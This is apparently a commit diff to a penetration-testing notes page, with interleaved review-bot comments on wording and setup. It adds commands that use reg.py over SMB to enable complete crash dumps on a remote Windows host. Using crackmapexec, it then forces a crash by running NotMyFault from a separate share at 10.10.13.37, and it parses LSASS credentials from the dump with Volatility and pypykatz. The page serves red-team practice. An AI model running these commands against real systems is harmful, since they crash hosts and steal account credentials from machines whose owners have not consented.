[AHK] Automatic update 👽
snovvcrash committed Nov 27, 2022
1 parent 1a579e1 commit 9f18cbc
Showing 1 changed file with 14 additions and 3 deletions.
@@ -323,15 +323,20 @@ chown ${SUDO_USER}:${SUDO_USER} out.bin

- [https://danielsauder.com/2016/02/06/memdumps-volatility-mimikatz-vms-part-3-windbg-mimikatz-extension/](https://danielsauder.com/2016/02/06/memdumps-volatility-mimikatz-vms-part-3-windbg-mimikatz-extension/)

Get current `CrashControl` settings and set `CrashDumpEnabled` to **0x01** (default dump location is `C:\Windows\MEMORY.dmp`):

```
$ reg.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.1 query -keyName 'HKLM\SYSTEM\CurrentControlSet\Control\CrashControl'
$ reg.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.1 add -keyName 'HKLM\SYSTEM\CurrentControlSet\Control\CrashControl' -v CrashDumpEnabled -vt REG_DWORD -vd 1
```

Crash the target machine, e. g. with [NotMyFault](https://learn.microsoft.com/en-us/sysinternals/downloads/notmyfault):

{% hint style="warning" %}
**This action causes DOS!** Do at your own risk.
{% endhint %}

```
$ reg.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.1 query -keyName 'HKLM\SYSTEM\CurrentControlSet\Control\CrashControl'
$ reg.py megacorp.local/snovvcrash:'Passw0rd!'@192.168.1.1 add -keyName 'HKLM\SYSTEM\CurrentControlSet\Control\CrashControl' -v CrashDumpEnabled -vt REG_DWORD -vd 1
$ cme smb 192.168.1.1 -u snovvcrash -p 'Passw0rd!' -x '\\10.10.13.37\notmyfaultc64.exe -accepteula /crash 0x03' --no-output
```
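Review bot: the new "Get current `CrashControl` settings" paragraph should state what value 1 means and what it requires. `CrashDumpEnabled = 1` selects a complete memory dump, and Windows only writes one when the page file on the system drive is at least physical RAM plus 1 MB (or a `DedicatedDumpFile` is configured); on a target with a small or disabled page file the `cme ... /crash` line still reboots the host but leaves no `MEMORY.dmp`, so the `query` output is worth reading for the page-file situation before running the `add`. Worth keeping the original `CrashDumpEnabled` value from that `query` as well, since nothing in this hunk sets it back once the dump has been collected.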

@@ -349,12 +354,17 @@ Parse LSASS with Mimikatz and [WinDbg](https://learn.microsoft.com/en-us/windows
Or with [Pypykatz plugin](https://github.com/skelsec/pypykatz-volatility3) for Volatility 3:

```
$ python3 vol.py -f MEMORY.dmp -p ~/tools/pypykatz-volatility3 pypykatz
$ pip install volatility3 pypykatz
$ git clone https://github.com/volatilityfoundation/volatility3 ~/tools/volatility3
$ git clone https://github.com/skelsec/pypykatz-volatility3 ~/tools/pypykatz-volatility3
$ cd ~/tools/volatility3
$ python3 vol.py -f /path/to/MEMORY.dmp -p ../pypykatz-volatility3 pypykatz
```

{% hint style="info" %}
Current version of `vol_pypykatz.py` need some changes to work with relevant version of Volatility 3:

{% code title="vol_pypykatz.patch" %}
```diff
diff --git a/vol_pypykatz.py b/vol_pypykatz.py
index 6c9592f..f53da1d 100644
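Review bot: `pip install volatility3` and the `git clone` of volatility3 on the following line duplicate each other. The pip package already installs the `vol` entry point, so the clone is only needed to run `vol.py` from the source tree as the last line does; keep one of the two, e.g. drop the clone and use `vol -f /path/to/MEMORY.dmp -p ~/tools/pypykatz-volatility3 pypykatz`, or keep the clone and drop `volatility3` from the `pip install`. The hint text should read "The current version of `vol_pypykatz.py` needs some changes to work with the current version of Volatility 3", and because "current" and "relevant" both go stale, name the Volatility 3 release and the plugin commit (`6c9592f` in the `index` line is the plugin side) the patch was written against. Finally, Volatility 3 fetches Windows kernel symbol PDBs from Microsoft's symbol server on first use, so the analysis host needs outbound access or a pre-populated symbols directory; a sentence saying so would save readers a confusing failure.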
@@ -390,6 +400,7 @@ index 6c9592f..f53da1d 100644
- )
+ return pparser.go_volatility3(self)
```
{% endcode %}
{% endhint %}

